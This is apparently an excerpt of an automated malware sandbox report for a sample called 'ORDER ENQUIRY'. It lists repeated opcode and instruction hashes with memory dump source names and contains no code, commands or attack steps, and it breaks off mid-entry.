                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d34ef8c34894e8fcea4411a8812bafd1f1ce75d2699e6290289bd432ab3c4ff3
                                                                                                                                                                          • Instruction ID: 9ab870762a26b1b9bed6a0015779d704c8c1ca93c2e2fa82f8779758f161e5fc
                                                                                                                                                                          • Opcode Fuzzy Hash: d34ef8c34894e8fcea4411a8812bafd1f1ce75d2699e6290289bd432ab3c4ff3
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E115B71A00209ABDF19EFA8C944EAE7BB5EB88340F00409AF901A7340DB35E921CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1854351d653de76c0d86e9b162a03880bf07c60cf211ed600335e483f924fa97
                                                                                                                                                                          • Instruction ID: 8b7f8cc84623179d2382d77a53bd6ac88dbf9c2b3ea75ecf6926b3efad7c34e8
                                                                                                                                                                          • Opcode Fuzzy Hash: 1854351d653de76c0d86e9b162a03880bf07c60cf211ed600335e483f924fa97
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D115A716043049FC700DF69C54195BBBE4EF98610F00855EBA98D7350D730E900CB92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                          • Instruction ID: e054c0a4c7f0f68ea82bc2330bf85612fae34e8f6808b29ed749df15fd4be41d
                                                                                                                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                                                                                                                          • Instruction Fuzzy Hash: 1001D8362006029FDB29AB69D844F96FBE6FFC5B10F044859E6428F650DB70F840C754
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f14ee4b397cc38ab48517656318bba099f1c718c817c1cf4260cc55d883d8840
                                                                                                                                                                          • Instruction ID: 8052e4026bc7e94a22fbd231d045861597a1116ad83f6647eec4635eb25531b9
                                                                                                                                                                          • Opcode Fuzzy Hash: f14ee4b397cc38ab48517656318bba099f1c718c817c1cf4260cc55d883d8840
                                                                                                                                                                          • Instruction Fuzzy Hash: 2E1157B16083089FC700DFA9C541A5BBBE4EF99750F00895EBA58D73A4E630E901CB92
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                          • Instruction ID: ae2064a5e461c082fbb5e5000f47ad5058c47ae2aecfd23a1536ade11c0063bb
                                                                                                                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                          • Instruction Fuzzy Hash: 72017C322406809FE32B971DC988F267FE8EF44B64F0D44A5F909CB6E2DB68DC40C661
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 787fb9c87e9253e534c27823701390d17086aaaa45d3c71c1a20ea3f78cae4e4
                                                                                                                                                                          • Instruction ID: 5d87698b5b7d43e3e5a54bda64add9d0c5289abcef7703ac860def5b8b214ef4
                                                                                                                                                                          • Opcode Fuzzy Hash: 787fb9c87e9253e534c27823701390d17086aaaa45d3c71c1a20ea3f78cae4e4
                                                                                                                                                                          • Instruction Fuzzy Hash: 6D01F771B00505EBCB18EBA9DD44ABFBBF8FF84210B854069D901A7280DF30DC05C290
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                          • Opcode ID: 34a76d15b4743d01b6beb87943271fe592ba15adf6562efa52555ee73de77377
                                                                                                                                                                          • Instruction ID: 435565ec1ce870b010a73187ede361f8ccac714bdcfc5ed784b80467598e6492
                                                                                                                                                                          • Opcode Fuzzy Hash: 34a76d15b4743d01b6beb87943271fe592ba15adf6562efa52555ee73de77377
                                                                                                                                                                          • Instruction Fuzzy Hash: B601DFB1684602AFD3395B19D941F12FAA8EF54B90F00046EF60A8B3A0C7B0D8408B94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2dd7b027fd81957f91bd464b65c9bb19262f62602576c7c11f11d595bf5c82da
                                                                                                                                                                          • Instruction ID: 29d4b93ffa6b2eadd187ead78b661d397bdfca92e7d88b47b420fdfe2ab15b70
                                                                                                                                                                          • Opcode Fuzzy Hash: 2dd7b027fd81957f91bd464b65c9bb19262f62602576c7c11f11d595bf5c82da
                                                                                                                                                                          • Instruction Fuzzy Hash: 4EF0F932741650B7C7319B568D80F577EAEEF84E90F04456AB60597641C634ED01CAA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                          • Instruction ID: 4425d0a935547de773268d0a3f31089e16e2e3d7e80cf31dcbff4c6d93f4feab
                                                                                                                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 19F0C2B2A00A11ABD324CF4DDD40E57FBEADBD1AA0F04812CF605C7220EA31ED04CB90
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                          • Instruction ID: b5e55eddf89b10c4abe2530462d18b56c0c04d34ab6e6e0eb859fec4f71a895c
                                                                                                                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF0FC732046239FF732576D8940B6BE9A58FD5A74F590039E2059B248CB608D0157E0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2d394b407daaf7477c74ab18ae182cda50667491b813a6acdc81e033999aa0f9
                                                                                                                                                                          • Instruction ID: 6cc5609b8f7a3d7f4813944d86b19fd086532dca9a1592d00a95e2a715883223
                                                                                                                                                                          • Opcode Fuzzy Hash: 2d394b407daaf7477c74ab18ae182cda50667491b813a6acdc81e033999aa0f9
                                                                                                                                                                          • Instruction Fuzzy Hash: F6014F71A10609EFDB04DFA9D591AAEB7F8FF58704F10406AFA14E7350D7749A01CBA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a560cb13660615b29e490ed3df2b17babdfeecbe2f5aeb27e62b1cd0d5bd317a
                                                                                                                                                                          • Instruction ID: e57df565b5422ab541c559a5a779cd33485e2580cb4d119176b770ee680c80ff
                                                                                                                                                                          • Opcode Fuzzy Hash: a560cb13660615b29e490ed3df2b17babdfeecbe2f5aeb27e62b1cd0d5bd317a
                                                                                                                                                                          • Instruction Fuzzy Hash: 1D012171A0020AABDB04DFA9D541AAEB7F8EF58704F50805AFA14E7350D7749D01CBA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 43e13fa391c82d0abbabdcac75efcd528c53780963c68e4d71890ebbc571abb3
                                                                                                                                                                          • Instruction ID: e1b8ea296d64ad2ba0be206c2633b38807dbdf8afd350bcb6eb48e6a9f1d2671
                                                                                                                                                                          • Opcode Fuzzy Hash: 43e13fa391c82d0abbabdcac75efcd528c53780963c68e4d71890ebbc571abb3
                                                                                                                                                                          • Instruction Fuzzy Hash: 7F017171A00209EBCB04DFA9D541AAEB7F8EF58700F10805AF900E7350D7749901CBA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                          • Instruction ID: ff7ce0ae48d295434f5a2f39e46b1acc943d0b663022ba408bfd9e72da1c86fb
                                                                                                                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                          • Instruction Fuzzy Hash: 2901F4322006959BD727A71DD809F99BBD9EF51764F0D84A5FA188B6A2D779C800C250
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f46125d70e6b33ee873711a29abfb0867dd6b34b4d872141c385d5d07878d5b5
                                                                                                                                                                          • Instruction ID: b75ed1a9a4fcdbe7a2cdd3beb165407f961701c94c2990cd7ec2a3285b5f80f0
                                                                                                                                                                          • Opcode Fuzzy Hash: f46125d70e6b33ee873711a29abfb0867dd6b34b4d872141c385d5d07878d5b5
                                                                                                                                                                          • Instruction Fuzzy Hash: D0014F71A002499BDB04DFA9D545AEEBBF8FF58710F14409AF501E7290D774EA01CB94
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                          • Instruction ID: fc8ec70ed4527978fb2e24cd167baebbf654681f834adc52c56b6ccd024ac06a
                                                                                                                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                          • Instruction Fuzzy Hash: F1F0F97220001DBFEF019F94DE81DAF7B7EEB99698B104165BA11A2160D631DE21ABA0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 3a13363256076030066465af8af16d23fdf67041c17946fe184f41ab319376fc
                                                                                                                                                                          • Instruction ID: 38fd4a71abe97810230fcb42041f515fd608754ae1e61bb439c2795cc7daa661
                                                                                                                                                                          • Opcode Fuzzy Hash: 3a13363256076030066465af8af16d23fdf67041c17946fe184f41ab319376fc
                                                                                                                                                                          • Instruction Fuzzy Hash: D6019A36100209ABCF129F94DC40EDE3F66FB4C754F068141FE19A6260C332E970EB81
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9f2a64351149b2ab7a9959bee64be59dee701b31a9fd45df8654a09491b4328c
                                                                                                                                                                          • Instruction ID: 2a4a6d097bcd15642b428ad58ac429ece5cd26b4dc4bc17f2846d45058895d15
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f2a64351149b2ab7a9959bee64be59dee701b31a9fd45df8654a09491b4328c
                                                                                                                                                                          • Instruction Fuzzy Hash: B8F024713043415BF758A7699C01B2236AAE7C0760FA9806AEB098F6C5FB70EC0183A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4c9987afd5b4ee7033785cebeec2142955ffb7f1a7c8c68b1f6b751b68169759
                                                                                                                                                                          • Instruction ID: b1b4d82442dc111e697f802f1f72549cd0661442d0fb8c4e89c67e933b8532f4
                                                                                                                                                                          • Opcode Fuzzy Hash: 4c9987afd5b4ee7033785cebeec2142955ffb7f1a7c8c68b1f6b751b68169759
                                                                                                                                                                          • Instruction Fuzzy Hash: EB01A4703006819BE737977CCD4CF653BE4FF50B00F4949A4FA498BAD6D728D8018620
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                          • Instruction ID: ca13e1490ca86c7d828e4094b0b41e5341e8f350906be47d008058b38f53a640
                                                                                                                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                          • Instruction Fuzzy Hash: 9AF02E31741D1347EBBDAB2E8554B2FA696DF90D40B0505BC9D01CB661FF20DC80C790
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8936586de897729c6913216b9acbad25a454c64977e90ad0e555a2abd61edffc
                                                                                                                                                                          • Instruction ID: d786fdaef61af0ee487ced8df243d343aa3c9a9cbd6d27174873029ef63571a1
                                                                                                                                                                          • Opcode Fuzzy Hash: 8936586de897729c6913216b9acbad25a454c64977e90ad0e555a2abd61edffc
                                                                                                                                                                          • Instruction Fuzzy Hash: CBF0AF716053049FC714EF68C542A2BBBE4FF98710F408A5EB998DB390E734EA01C796
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                          • Instruction ID: 2a17cac4db121086e1114bce96f12295545dbd35495dfeb550768074bd640ae8
                                                                                                                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                          • Instruction Fuzzy Hash: C3F08933F155129BD7359A4DCC80F56B768EFD5A60F1901AAAA04AB260C760FC11C7D0
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                          • Instruction ID: 74ee4ee5d8c36a1d169f5c13fc737b5611a0b0cc6cfb9daeb7a3a518b0e4f834
                                                                                                                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                                                                                                          • Instruction Fuzzy Hash: F0F0BE72710205AFE725DB25CE05F96B6F9EFA8740F148478E949D72A0FAB0EE01C694
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9f067f6cbbd03b2f1e859e5a7262725088c41922f76633e1366cb8f7871bb229
                                                                                                                                                                          • Instruction ID: 097cb3df08b7ba51ed733466678be37f31ba9c99fa3dbcd9911826b156b830ce
                                                                                                                                                                          • Opcode Fuzzy Hash: 9f067f6cbbd03b2f1e859e5a7262725088c41922f76633e1366cb8f7871bb229
                                                                                                                                                                          • Instruction Fuzzy Hash: BBF06270A01249DFCB04EFA9C655AAEBBF4FF58300F00815AB955EB385DA34EE01CB54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 82e77a36450c5a10569d07c6686f59d2d1c576e370768cb9c9d8b49a418a9078
                                                                                                                                                                          • Instruction ID: 90352160b5b5464e19f750485883f82f929fea790cdb03ba893afdea01f5285c
                                                                                                                                                                          • Opcode Fuzzy Hash: 82e77a36450c5a10569d07c6686f59d2d1c576e370768cb9c9d8b49a418a9078
                                                                                                                                                                          • Instruction Fuzzy Hash: 76F0B4319166E19FE733DBECC5C4BA17BECEB08A30F08496AE58B87543C724D880C691
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ec3f921088fe0663ba2b56003d0276aa2ec916b3642012a417cc8975196f6873
                                                                                                                                                                          • Instruction ID: 880463b52ff77a02bf1fe0c70d480aa3d37b0d5583caefc075886aa728b65b3d
                                                                                                                                                                          • Opcode Fuzzy Hash: ec3f921088fe0663ba2b56003d0276aa2ec916b3642012a417cc8975196f6873
                                                                                                                                                                          • Instruction Fuzzy Hash: CAF05CAB4196C00ACF3A7B3C74613D16F58E767210F4D20CAF5B157605C7788483C320
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 4610be2f12dab9c5fd3fea4047cc1ba81d560ce57da4c21b530f2949171d116b
                                                                                                                                                                          • Instruction ID: 31c2ed3ed1f41a0762788d3554dadf1cba1ae5027cfd39471724e31053b488e1
                                                                                                                                                                          • Opcode Fuzzy Hash: 4610be2f12dab9c5fd3fea4047cc1ba81d560ce57da4c21b530f2949171d116b
                                                                                                                                                                          • Instruction Fuzzy Hash: 51F0E2715156919FE722971CC14CB23BBE49B81BB1F08B465D40A87556C364E880CE50
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                          • Instruction ID: 0d8bdd64d85ae9d0966481ae6bc62ee28c29eaef477f442586840ae2cc8b666c
                                                                                                                                                                          • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                                                                                                          • Instruction Fuzzy Hash: FFE0D8723006016BE7119F998DC0F477B6EDFD6B10F04007EB6045F251CAE2DC0986A4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                          • Instruction ID: 158e084d13c291ce42b7bf75b128ab06cfe09dce7679fc5d4c825a9dc4422610
                                                                                                                                                                          • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                                                                                                          • Instruction Fuzzy Hash: 5DF06572204204DFE3298F09D984F52B7F8EB1A765F45C069E6099B661D379EC40DFA4
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000003.00000002.2158429548.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_3_2_1a80000_ORDER ENQUIRY.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                                                                                                          • Instruction ID: 42e9d39f0dda097c1fb76e5aae1722c34383243fdfd79a9ae2f2bf6a27d1e755
